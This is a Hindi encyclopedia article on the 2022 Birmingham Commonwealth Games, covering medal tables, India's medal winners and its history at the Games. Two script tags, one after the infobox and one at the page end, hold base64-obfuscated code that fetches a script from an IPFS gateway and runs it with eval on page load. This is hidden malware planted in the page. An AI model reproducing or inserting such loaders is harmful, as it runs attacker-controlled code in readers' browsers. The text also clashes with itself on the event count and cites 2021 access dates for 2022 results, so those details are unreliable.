राष्ट्रमंडल खेल 2022

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
राष्ट्रमंडल खेल 2022
राष्ट्रमंडल खेल 2022 का प्रतीक चिह्न
मेजबान शहर बर्मिघम, इंग्लैंड
उद्घाटन 28 जुलाई, 2022
समापन 8 अगस्त, 2022
देश 72 राष्ट्रमंडल देश
कुल एथलीट 5000 (लगभग)
प्रतियोतियाएँ 20 खेलों में 200 स्पर्धायें
शीर्ष स्थान ऑस्ट्रेलिया - 67 स्वर्ण पदक

इंग्लैंड - 57 स्वर्ण पदक
कनाडा - 26 स्वर्ण पदक
भारत - 22

वेबसाइट www.birmingham2022.com/
संबंधित लेख राष्ट्रमंडल खेल, राष्ट्रमंडल खेल 2018, राष्ट्रमंडल खेल 2010, ओलम्पिक खेल

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>राष्ट्रमंडल खेल 2022 या राष्ट्रमंडल खेल 2022 (अंग्रेज़ी: Commonwealth Games 2022) का आयोजन बर्मिघम, इंग्लैंड में किया गया था। वर्ष 2022 में 22वें राष्ट्रमंडल खेलों का शुभारम्भ 28 जुलाई, 2022 को हुआ और समापन समारोह 8 अगस्त, 2022 को हुआ। इन खेलों में 72 देशों ने शिरकत की और 283 स्पर्द्धाओं पांच हज़ार से अधिक खिलाड़ियों ने हिस्सा लिया। इन खेलों में 178 पदक लेकर सबसे ऊपर ऑस्ट्रेलिया रहा। उसने 67 स्वर्ण अपने नाम किए। दूसरे नंबर पर इंग्लैंड रहा, जिसे कुल 176 पदक मिले। जिनमें से 57 स्वर्ण थे। तीसरे नंबर पर कनाडा रहा, जिसे 92 पदक मिले। उसने कुल 26 स्वर्ण हासिल किए। भारत इस बार पदक तालिका में चढ़कर चौथे स्थान पर रहा। भारत को कुल 61 पदक मिले, जिनमें 22 स्वर्ण, 16 सिल्वर और 23 कांस्य पदक रहे। भारत ने 16 स्पर्द्धाओं में ये प्रदर्शन किया।

आयोजन

राष्ट्रमंडल खेल हर चार साल में आयोजित किए जाते हैं, जिसमें राष्ट्रमंडल राष्ट्र बहु-खेल आयोजन में प्रतिस्पर्धा करते हैं। यह सबसे प्रतिष्ठित प्रतियोगिताओं में से एक है। राष्ट्रमंडल खेल 2022 की शुरुआत बर्मिघम, इंग्लैंड में 28 जुलाई, 2022 से हुई और यह 8 अगस्त, 2022 को समाप्त हुये। राष्ट्र और एथलीट राष्ट्रमंडल खेल 2022 में विश्व के विभिन्न कोनों से आये 5000 से अधिक एथलीटों ने विभिन्न प्रतिस्पर्धाओं में भाग लिया। 22वें राष्ट्रमंडल खेलों के इस संस्करण में 72 देशों की भागीदारी थी।

इवेंट्स की संख्या
बड़ी संख्या में एथलीटों ने एथलेटिक्स, बैडमिंटन, हॉकी, मुक्केबाज़ी, नेटबॉल, स्क्वैश सहित अन्य 20 खेलों में प्रतिस्पर्धा की। हालांकि, कुछ इवेंट ऐसे भी रहे, जिन्हें राष्ट्रमंडल खेल 2022 में पहली बार शामिल किया गया था। इसमें महिला क्रिकेट, बास्केटबॉल 3×3, व्हीलचेयर बास्केटबॉल और पैरा टेबल टेनिस शामिल है।

आदर्श वाक्य और विजन
राष्ट्रमंडल खेल 2022 का आदर्श वाक्य सभी के लिए खेल था। साथ ही कॉमनवेल्थ 2022 का विजन लोगों को एक साथ लाना, स्वास्थ्य में सुधार करना और बदलाव के लिए उत्प्रेरक के रूप में कार्य करना है था। इससे भी अहम यह रहा कि मेजबान कभी ना भूल पाने वाले खेल कराना चाहते थे।

शुभंकर
राष्ट्रमंडल खेल 2022 के शुभंकर का नाम 'पेरी' है। यह सभी से कॉमनवेल्थ गेम्स का समर्थन करने का अनुरोध कर रहा था। पेरी एक प्रकार का बहुरंगी बैल है। राष्ट्रमंडल खेल 2022 के शुभंकर के रूप में पेरी द बैल को चुनने के पीछे जानवर के साथ गहरे लगाव की कहानी है। वेस्ट मिडलैंड्स के शहर में सदियों से बुल रिंग है, जिसमें कांस्य की एक प्रतिष्ठित बैल संरचना है। पेरी को ग्रेटर मैनचेस्टर के बोल्टन की 10 वर्षीय एम्मा लू ने डिजाइन किया था, जिन्होंने शुभंकर बनाने के लिए एक राष्ट्रीय प्रतियोगिता जीती थी। बीबीसी के साथ बातचीत में एम्मा लू ने बताया था कि मैंने बर्मिंघम में बुलरिंग के कारण एक बैल को चुना और मैंने हेक्सागोन का उपयोग करने का फैसला किया, क्योंकि वे सबसे मजबूत आकार का है और पूरी दुनिया एक दूसरे पर निर्भर है।

सफल देश
ऑस्ट्रेलिया 67 स्वर्ण, 57 रजत और 54 कांस्य समेत कुल 178 पदकों के साथ पहले स्थान पर रहा। इंग्लैंड 57 स्वर्ण, 66 रजत और 53 कांस्य समेत 176 पदकों के साथ दूसरे और कनाडा 26 स्वर्ण, 32 रजत और 34 कांस्य समेत 92 पदकों के साथ तीसरे स्थान पर रहा। भारत ने बर्मिंघम राष्ट्रमंडल खेलों में 22 स्वर्ण, 16 रजत और 23 कांस्य समेत कुल 61 पदक अपने नाम किए और चौथे स्थान पर रहा।

पदक तालिका

पदक विजेता देश (राष्ट्रमंडल खेल 2022)
स्थान देश ध्वज स्वर्ण रजत कांस्य योग
01 ऑस्ट्रेलिया 67 57 54 178
02 इंग्लैंड 57 66 53 176
03 कनाडा 26 32 34 92
04 भारत 22 16 23 61
05 न्यूजीलैंड 20 12 17 49
06 स्कॉटलैंड 13 11 27 51
07 नाइजीरिया 12 09 14 35
08 वेल्स 08 06 14 28
09 दक्षिण अफ्रीका 07 09 11 27
10 मलेशिया 07 08 08 23
11 उत्तरी आयरलैंड 07 07 04 18
12 जमैका 06 06 03 15
13 केन्या 06 05 10 21
14 सिंगापुर 04 04 04 12
15 त्रिनिदाद और टोबैगो 03 02 01 06
16 युगांडा 03 00 02 05
17 साइप्रस 02 03 06 11
18 पाकिस्तान 02 03 03 08
19 समोआ 01 04 00 05
20 बारबाडोस 01 01 01 03
20 कैमरून 01 01 01 03
20 जाम्बिया 01 01 01 03
23 ग्रेनाडा 01 01 00 02
23 बहामास 01 01 00 02
25 बरमूडा 01 00 01 02
26 ब्रिटिश वर्जिन आइलैंड्स 01 00 00 01
27 मॉरीशस 00 03 02 05
28 घाना 00 02 03 05
29 फिजी 00 02 02 04
30 मोज़ाम्बिक 00 02 01 03
31 श्रीलंका 00 01 03 04
32 तंजानिया 00 01 02 03
33 बोत्सवाना 00 01 01 02
33 ग्वेर्नसे 00 01 01 02
35 डोमिनिका 00 01 00 01
35 पापुआ न्यू गिनी 00 01 00 01
35 सेंट लूसिया 00 01 00 01
35 गाम्बिया 00 01 00 01
39 नामीबिया 00 00 04 04
40 माल्टा 00 00 01 01
40 नाउरू 00 00 01 01
40 नीयू 00 00 01 01
40 वानुअतु 00 00 01 01

भारत का प्रदर्शन

राष्ट्रमंडल खेल में भारत का प्रदर्शन
वर्ष मेजबान देश पदक संख्या पदक तालिका में स्थान
2022 बर्मिघम, इंग्लैंड 61 चतुर्थ
2018 गोल्ड कोस्ट, ऑस्ट्रेलिया 66 तृतीय
2014 ग्लासगो, स्काटलैंड 64 पंचम
2010 दिल्ली, भारत 101 द्वितीय
2006 मेलबर्न, ऑस्ट्रेलिया 50 चतुर्थ
2002 मैनचेस्टर, इंग्लैंड 69 चतुर्थ

2022 में प्रदर्शन

बर्मिंघम में राष्ट्रमंडल खेल 2022 में लगभग 200 भारतीय एथलीटों ने 16 विभिन्न खेलों में पदक के लिए प्रतिस्पर्धा की। गोल्ड कोस्ट, 2018 भारतीय एथलीटों ने कुल 66 पदक जीते थे। जिसमें 26 स्वर्ण, 20 रजत और 20 कांस्य पदक शामिल थे। इस तरह भारत मेजबान ऑस्ट्रेलिया और इंग्लैंड के बाद तीसरे स्थान पर रहा था। निशानेबाज़ी के खेल ने गोल्ड कोस्ट, 2018 में 66 पदकों में से 16 पदक जीतने में मदद की। हालांकि, बर्मिंघम 2022 के राष्ट्रमंडल खेलों के प्रोग्राम से इस खेल को हटा दिया गया था।

राष्ट्रमंडल खेल 2022 से पहले हुए राष्ट्रमंडल खेलों में भारत के जीते गए कुल 503 पदकों में से 135 पदक निशानेबाजी में आए, जो किसी भी अन्य खेल में जीते गए पदकों की तुलना में सबसे अधिक रहे। इसमें 2010 में नई दिल्ली में हुए राष्ट्रमंडल खेल के दौरान जीते गए भारतीय निशानेबाजों के 30 पदक भी शामिल हैं। इसकी वजह से भारत ने इतिहास में अपने सबसे सफल राष्ट्रमंडल खेल का लुत्फ उठाया, जिसमें उन्होंने कुल 101 पदक जीते। टोक्यो ओलंपिक में भाला फेंक चैंपियन और विश्व चैंपियनशिप के रजत पदक विजेता नीरज चोपड़ा की चोट के कारण राष्ट्रमंडल खेल 2022 से बाहर होने से निश्चित रूप से भारत एक पदक से चूक गया।

निशानेबाजी खेल के शामिल नहीं होने और नीरज चोपड़ा की अनुपस्थिति में भारतीय कुश्ती दल के ओलंपिक पदक विजेता रवि कुमार दहिया, बजरंग पुनिया, साक्षी मलिक और दो बार की ओलंपिक पदक विजेता पी. वी. सिंधु, विश्व चैंपियनशिप पदक विजेता किदांबी श्रीकांत और लक्ष्य सेन की अगुवाई वाली भारतीय टीम ने राष्ट्रमंडल खेल 2022 में शानदार प्रदर्शन किया। राष्ट्रमंडल खेल 2022 में भारतीय एथलीटों ने कुल 61 पदक जीते। जिसमें 22 स्वर्ण, 16 रजत और 23 कांस्य पदक शामिल रहे। संकेत सरगर बर्मिंघम में पदक जीतने वाले पहले भारतीय थे, जिन्होंने पुरुषों की 55 कि.ग्रा. भारोत्तोलन स्पर्धा में रजत पदक जीता था।

वहीं, मीराबाई चानू राष्ट्रमंडल खेल 2022 में स्वर्ण जीतने वाली पहली भारतीय थीं, जबकि जेरेमी लालरिनुंगा बर्मिंघम में शीर्ष पोडियम हासिल करने वाले पहले भारतीय एथलीट थे। इसके अलावा सुधीर लाठ ने सीडब्ल्यूजी 2022 में पैरा स्पोर्ट्स में भारत के लिए पहला स्वर्ण पदक जीता। वह पैरा पावरलिफ्टिंग पुरुषों के हैवीवेट वर्ग में चैंपियन बने।

भारत की पदक तालिका (राष्ट्रमंडल खेल 2022)
क्र.सं. खेल स्वर्ण रजत कांस्य योग
01 कुश्ती 06 01 05 12
02. टेबल टेनिस 04 01 02 07
03. भारोत्तोलन 03 03 04 10
04. बैडमिंटन 03 01 02 06
05. ट्रैक एंड फील्ड 01 04 03 08
06. मुक्केबाज़ी 03 01 03 07
07. लॉन बॉल्स 01 01 00 02
08. पैरा पावरलिफ्टिंग 01 00 00 01
09. क्रिकेट 00 01 00 01
10. हॉकी 00 01 01 02
11. जूडो 00 02 01 03
12. स्क्वैश 00 00 02

02

13. कुल योग 22 16 23 61

भारत के पदक विजेता

पदक विजेता (राष्ट्रमंडल खेल 2022)
क्रमांक नाम चित्र पदक स्पर्धा खेल
1 संकेत सरगर
संकेत सरगर
रजत पुरुष 55 कि.ग्रा. भारोत्तोलन
2 गुरुराजा पुजारी
गुरुराजा पुजारी
कांस्य पुरुष 61 कि.ग्रा. भारोत्तोलन
3 मीराबाई चानू
मीराबाई चानू
स्वर्ण महिला 49 कि.ग्रा. भारोत्तोलन
4 बिंदियारानी देवी
बिंदियारानी देवी
रजत महिला 55 कि.ग्रा. भारोत्तोलन
5 जेरेमी लालरिनुंगा
जेरेमी लालरिनुंगा
स्वर्ण पुरुष 67 कि.ग्रा. भारोत्तोलन
6 अंचिता शेउली
अंचिता शेउली
स्वर्ण पुरुष 73 कि.ग्रा. भारोत्तोलन
7 सुशीला देवी
सुशीला लिकमाबाम
रजत महिला 48 कि.ग्रा. जूडो
8 विजय कुमार यादव
विजय कुमार यादव
कांस्य पुरुष 60 क्रिग्रा जूडो
9 हरजिंदर कौर
हरजिंदर कौर
कांस्य महिला 71 कि.ग्रा. भारोत्तोलन
10 भारतीय महिला टीम स्वर्ण महिला फोर लॉन बाउल्स
11 भारतीय पुरुष टीम स्वर्ण पुरुष स्पर्धा टेबल टेनिस
12 विकास ठाकुर
विकास ठाकुर
रजत पुरुष 96 क्रिग्रा भारोत्तोलन
13 भारतीय मिश्रित टीम रजत मिश्रित टीम बैडमिंटन
14 लवप्रीत सिंह
लवप्रीत सिंह
कांस्य पुरुष 109 कि.ग्रा. भारोत्तोलन
15 सौरव घोषाल
सौरव घोषाल
कांस्य पुरुष सिंगल्स स्क्वैश
16 तूलिका मान
तूलिका मान
रजत महिला +78कि.ग्रा. जूडो
17 गुरदीप सिंह
गुरदीप सिंह
कांस्य पुरुष 109+ कि.ग्रा. भारोत्तोलन
18 तेजस्विन शंकर
तेजस्विन शंकर
कांस्य पुरुष हाई जंप एथलेटिक्स
19 मुरली श्रीशंकर
मुरली श्रीशंकर
रजत पुरुष लॉन्ग जंप एथलेटिक्स
20 सुधीर लाठ
सुधीर लाठ
स्वर्ण पुरुष हेवीवेट पैरा पावरलिफ्टिंग
21 अंशू मलिक
अंशू मलिक
रजत महिला 57 कि.ग्रा. कुश्ती
22 बजरंग पुनिया
बजरंग पुनिया
स्वर्ण पुरुष 65 कि.ग्रा. फ्रीस्टाइल कुश्ती
23 साक्षी मलिक
साक्षी मलिक
स्वर्ण महिला 62 कि.ग्रा. फ्रीस्टाइल कुश्ती
24 दीपक पुनिया
दीपक पुनिया
स्वर्ण पुरुष 86 कि.ग्रा. फ्रीस्टाइल कुश्ती
25 दिव्या काकरन
दिव्या काकरन
कांस्य महिला 68 कि.ग्रा. फ्रीस्टाइल कुश्ती
26 मोहित ग्रेवाल
मोहित ग्रेवाल
कांस्य पुरुष 125 कि.ग्रा. कुश्ती
27 प्रियंका गोस्वामी
प्रियंका गोस्वामी
रजत महिला 10,000 मीटर रेस वॉक एथलेटिक्स
28 अविनाश साबले
अविनाश साबले
रजत पुरुष 3000 मीटर स्टीपलचेज एथलेटिक्स
29 भारतीय पुरुष टीम रजत पुरुष फोर लॉन बाउल्स
30 जैस्मिन लंबोरिया
जैस्मिन लंबोरिया
कांस्य महिला 60 कि.ग्रा. लाइटवेट मुक्केबाज़ी
31 पूजा गहलोत
पूजा गहलोत
कांस्य महिला 50 कि.ग्रा. फ्रीस्टाइल कुश्ती
32 रवि कुमार दहिया
रवि कुमार दहिया
स्वर्ण पुरुष 57 कि.ग्रा. फ्रीस्टाइल कुश्ती
33 विनेश फोगाट
विनेश फोगाट
स्वर्ण महिला 53 कि.ग्रा. फ्रीस्टाइल कुश्ती
34 नवीन मलिक
नवीन मलिक
स्वर्ण पुरुष 74 कि.ग्रा. फ्रीस्टाइल कुश्ती
35 पूजा सिहाग
पूजा सिहाग
कांस्य महिला 76 कि.ग्रा. फ्रीस्टाइल कुश्ती
36 दीपक नेहरा
दीपक नेहरा
कांस्य पुरुष 97 कि.ग्रा. फ्रीस्टाइल कुश्ती
37 मोहम्मद हुसामुद्दीन
मोहम्मद हुसामुद्दीन
कांस्य पुरुष 57 कि.ग्रा. फेदरवेट मुक्केबाज़ी
38 रोहित टोकस
रोहित टोकस
कांस्य पुरुष 67 कि.ग्रा. वेल्टरवेट मुक्केबाज़ी
39 भाविना पटेल
भाविना पटेल
स्वर्ण महिला सिंगल्स क्लासेस 3-5 पैरा टेबल टेनिस
40 सोनलबेन पटेल
सोनलबेन पटेल
कांस्य महिला सिंगल्स क्लासेस 3-5 पैरा टेबल टेनिस
41 महिला हॉकी टीम कांस्य महिला टीम हॉकी
42 नीतू घंघास
नीतू घंघास
स्वर्ण महिला 48 कि.ग्रा. मिनिममवेट मुक्केबाज़ी
43 अमित पंघाल
अमित पंघाल
स्वर्ण पुरुष फ्लाईवेट 51 कि.ग्रा. मुक्केबाज़ी
44 एल्डहॉस पॉल
एल्डहॉस पॉल
स्वर्ण पुरुष ट्रिपल जंप एथलेटिक्स
45 अब्दुल्ला अबुबकर
अब्दुल्ला अबुबकर
रजत पुरुष ट्रिपल जंप एथलेटिक्स
46 संदीप कुमार
संदीप कुमार
कांस्य पुरुष 10000 मीटर रेस वॉक एथलेटिक्स
47 अन्नू रानी
अन्नू रानी
कांस्य महिला जैवलिन थ्रो एथलेटिक्स
48 निखत ज़रीन
निखत ज़रीन
स्वर्ण महिला 50 कि.ग्रा. लाइट फ्लाईवेट मुक्केबाज़ी
49 अचंत शरत कमल/जी. साथियान
अचंत शरत कमल और जी. साथियान
रजत पुरुष डबल्स टेबल टेनिस
50 दीपिका पल्लीकल / सौरव घोषाल
सौरव घोषाल और दीपिका पल्लीकल
कांस्य मिश्रित डबल्स स्क्वैश
51 किदम्बी श्रीकान्त
किदम्बी श्रीकान्त
कांस्य पुरुष सिंगल्स बैडमिंटन
52 भारतीय महिला टीम रजत महिला T20 क्रिकेट
53 अचंत शरत कमल/श्रीजा अकुला
अचंत शरत कमल और श्रीजा अकुला
स्वर्ण मिश्रित डबल्स टेबल टेनिस
54 त्रिशा जॉली / गायत्री गोपीचंद
त्रिशा जॉली और गायत्री गोपीचंद
कांस्य महिला डबल्स बैडमिंटन
55 सागर अहलावत
सागर अहलावत
रजत पुरुष 92+ कि.ग्रा. सुपर हेवीवेट मुक्केबाज़ी
56 पी. वी. सिंधु
पी. वी. सिंधु
स्वर्ण महिला सिंगल्स बैडमिंटन
57 लक्ष्य सेन
लक्ष्य सेन
स्वर्ण पुरुष एकल बैडमिंटन
58 साथियान ज्ञानसेकरन
साथियान ज्ञानसेकरन
कांस्य पुरुष एकल टेबल टेनिस
59 सात्विकसाईंराज रंकीरेड्डी / चिराग शेट्टी
सात्विकसाईंराज और चिराग शेट्टी
स्वर्ण पुरुष डबल्स बैडमिंटन
60 अचंत शरत कमल
अचंत शरत कमल
स्वर्ण पुरुष एकल टेबल टेनिस
61 भारतीय पुरुष हॉकी टीम रजत पुरुष हॉकी हॉकी


राष्ट्रमंडल खेल 2022 में भारतीय खिलाड़ियों ने कई प्रतिस्पार्धाओं में भाग लिया और पदक जीते। वे खिलाड़ी जिन्होंने स्वर्ण पदक, रजत पदक तथा कांस्य पदक प्राप्त किये, उनके नाम इस प्रकार हैं-

22 स्वर्ण

मीराबाई चानू, जेरेमी लालरिनुंगा, अंचिता शेउली, महिला लॉन बॉल टीम, टीटी पुरुष टीम, सुधीर लाठ, बजरंग पुनिया, साक्षी मलिक, दीपक पुनिया, रवि दहिया, विनेश फोगाट, नवीन मलिक, भाविना पटेल, नीतू घंघास, अमित पंघाल, एल्डहॉस पॉल, निखत ज़रीन, शरत कमल-श्रीजा अकुला, पी.वी. सिंधु, लक्ष्य सेन, सात्विकसाईराज रंकीरेड्डी-चिराग शेट्टी, शरत कमल

16 रजत

संकेत महादेव सरगर, बिंदियारानी देवी, सुशीला लिकमाबाम, विकास ठाकुर, भारतीय बैडमिंटन टीम, तूलिका मान, मुरली श्रीशंकर, अंशू मलिक, प्रियंका गोस्वामी, अविनाश साबले, पुरुष लॉन बॉल टीम, अब्दुल्ला अबुबकर, शरत कमल-जी. साथियान, महिला क्रिकेट टीम, सागर अहलावत, पुरुष हॉकी टीम।

23 कांस्य

गुरुराजा पुजारी, विजय कुमार यादव, हरजिंदर कौर, लवप्रीत सिंह, सौरव घोषाल, गुरदीप सिंह, तेजस्विन शंकर, दिव्या काकरन, मोहित ग्रेवाल, जैस्मिन लंबोरिया, पूजा गहलोत, पूजा सिहाग, मोहम्मद हुसामुद्दीन, दीपक नेहरा, रोहित टोकस, महिला हॉकी टीम, संदीप कुमार, अन्नू रानी, सौरव घोषाल-दीपिका, किदांबी श्रीकांत, त्रिषा-गायत्री, जी. साथियान[1]

2026 राष्ट्रमंडल खेल

राष्ट्रमंडल खेलों का आयोजन साल 2026 में विक्टोरिया में किया जाएगा, जिसमें अधिकांश इवेंट राज्य के क्षेत्रीय केंद्रों द्वारा आयोजित किए जाएंगे। राष्ट्रमंडल खेलों में पहले विक्टोरिया 2026 एक मल्टी-सिटी मॉडल पेश करेगा जो वैश्विक खेल को Geelong, Bendigo, Ballarat, और Gippsland में चार क्षेत्रीय केंद्रों तक पहुंचाएगा। राष्ट्रमंडल खेल, 2026 में 74 देशों के भाग लेने की उम्मीद है। उद्घाटन समारोह 17 मार्च, 2026 को होगा और समापन 29 मार्च, 2026 को होगा।[2]

1930 में शुरू हुआ था राष्ट्रमंडल खेल

सन 1930 में शुरू हुए राष्ट्रमंडल खेल में भारत अब तक 18 बार भाग ले चुका है। उसने चार बार हिस्सा नहीं लिया। भारतीय खिलाड़ी 1930, 1950, 1962 और 1986 राष्ट्रमंडल खेलों में नहीं उतरे थे। 1934 में पहली बार भारतीय खिलाड़ियों ने जब भाग लिया था तब इसे ब्रिटिश एम्पायर गेम्स कहा जाता था।

आजादी के बाद पहली बार भारत ने 1954 में राष्ट्रमंडल खेलों में भाग लिया था। 1966 में पहली बार पदकों की संख्या 10 को पार किया। 1966 राष्ट्रमंडल खेलों के बाद भारत ने रफ्तार पकड़ ली। उसके बाद पदकों की संख्या लगातार बढ़ती रही। साल 2000 के बाद से राष्ट्रमंडल खेलों में भारत ने लगातार शानदार प्रदर्शन किया और पदकों की संख्या 50 के पार पहुंच गई। भारत के लिए 2010 राष्ट्रमंडल खेल सबसे शानदार रहा था। तब भारत ने अपनी मेजबानी में सर्वश्रेष्ठ प्रदर्शन किया था। भारत ने 2010 दिल्ली राष्ट्रमंडल खेलों में 101 पदक जीते थे। इनमें 38 स्वर्ण, 27 रजत और 36 कांस्य शामिल थे।

भारत के मुख्य पड़ाव

लंदन 1934- भारतीय खिलाड़ी पहली बार टूर्नामेंट में उतरे। छह एथलीटों ने 10 ट्रैक एंड फील्ड इवेंट्स और एक कुश्ती स्पर्धा में भाग लिया। भारत ने तब अपना पहला पदक जीता था। उसे पुरुषों की 74 किग्रा फ्रीस्टाइल कुश्ती स्पर्धा में राशिद अनवर ने रजत पदक दिलाया था। वह राष्ट्रमंडल खेलों में पदक जीतने वाले पहले भारतीय खिलाड़ी हैं।[3]

सिडनी 1938- भारत ने मुख्य रूप से साइकिलिंग में हिस्सा लिया था, लेकिन एक भी पदक नहीं मिला।

वैंकूवर 1954- भारत 1947 में आजाद होने के बाद पहली बार राष्ट्रमंडल खेलों में उतरा। उसने 1950 ऑकलैंड राष्ट्रमंडल खेलों में हिस्सा नहीं लिया था। 1954 में भारत के एथलीटों ने कुछ खेलों में हिस्सा लिया, लेकिन एक भी पदक नहीं जीत पाए।

कार्डिफ 1958- भारत को पहली बार राष्ट्रमंडल खेलों में स्वर्ण पदक मिला। महान धावक मिलखा सिंह राष्ट्रमंडल खेलों में स्वर्ण अपने नाम करने वाले पहले पहले भारतीय खिलाड़ी बने। उन्होंने पुरुषों की 440 यार्ड स्पर्धा में पहला स्थान हासिल किया। कुश्ती में पहलवान लीला राम ने पुरुषों की 100 किग्रा फ्रीस्टाइल स्पर्धा में भारत को स्वर्ण दिलाया। इस साल पहली बार भारतीय महिला एथलीट राष्ट्रमंडल खेलों में उतरीं। ट्रैक एंड फील्ड एथलीट स्टेफनी डिसूजा और एलिजाबेथ डेवनपोर्ट ने हिस्सा लिया था। कुश्ती में लक्ष्मीकांत पांडेय ने रजत पदक अपने नाम किया था।

किंग्सटन, जमैका 1966- भारत ने 1962 पर्थ राष्ट्रमंडल खेलों में हिस्सा नहीं लिया था। 1966 में भारत को तीन स्वर्ण, चार रजत और तीन कांस्य मिला। इस तरह भारत ने 10 पदक अपने नाम किए। यह अब तक का सर्वश्रेष्ठ प्रदर्शन था। भारत की तीनों स्वर्ण कुश्ती में मिले। दो रजत और दो कांस्य भी इसी खेल से आए। मोहन घोष वेटलिफ्टिंग और दिनेश खन्ना बैडमिंटन में पदक जीतने वाले पहले भारतीय बने। दोनों ने क्रमश: रजत और कांस्य पदक अपने नाम किया।[3]

दिल्ली 2010- भारत को पहली बार राष्ट्रमंडल खेलों की मेजबानी का मौका मिला। भारत इस बार अपना सर्वश्रेष्ठ प्रदर्शन किया। उसने 101 पदक अपने नाम किए। इनमें 38 स्वर्ण, 27 रजत और 36 कांस्य पदक थे। भारत ऐसा प्रदर्शन फिर दोहरा नहीं पाया।

बर्मिंघम 2022- महिला क्रिकेट को पहली बार राष्ट्रमंडल खेलों में शामिल किया गया। पहले ही संस्करण में भारत ने क्रिकट में रजत जीता। वहीं, ऑस्ट्रेलिया को स्वर्ण पदक मिला। हरमनप्रीत कौर ने भारतीय महिला क्रिकेट टीम का नेतृत्व किया। शूटिंग और आर्चरी को बर्मिंघम राष्ट्रमंडल खेलों में शामिल नहीं किया गया था।

राष्ट्रमंडल खेल, 2026

साल 2026 के राष्ट्रमंडल खेल ऑस्ट्रेलिया के विक्टोरिया में आयोजित किए जाएंगे। यह पहला अवसर होगा, जब इन खेलों का आयोजन कई शहरों में किया जाएगा। इनमें बैलरेट, बेंडिगो, जिलॉन्ग, गिप्सलैंड और मेलबर्न जैसे शहर शामिल हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. CWG का समापन (हिंदी) amarujala.com। अभिगमन तिथि: 06 सितंबर, 2021।
  2. Commonwealth Games 2022 Medal Tally (हिंदी) hindi.sscadda.com। अभिगमन तिथि: 06 सितंबर, 2021।
  3. 3.0 3.1 राष्ट्रमंडल खेलों में भारत का पांचवां सर्वश्रेष्ठ प्रदर्शन (हिंदी) amarujala.com। अभिगमन तिथि: 06 सितंबर, 2021।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>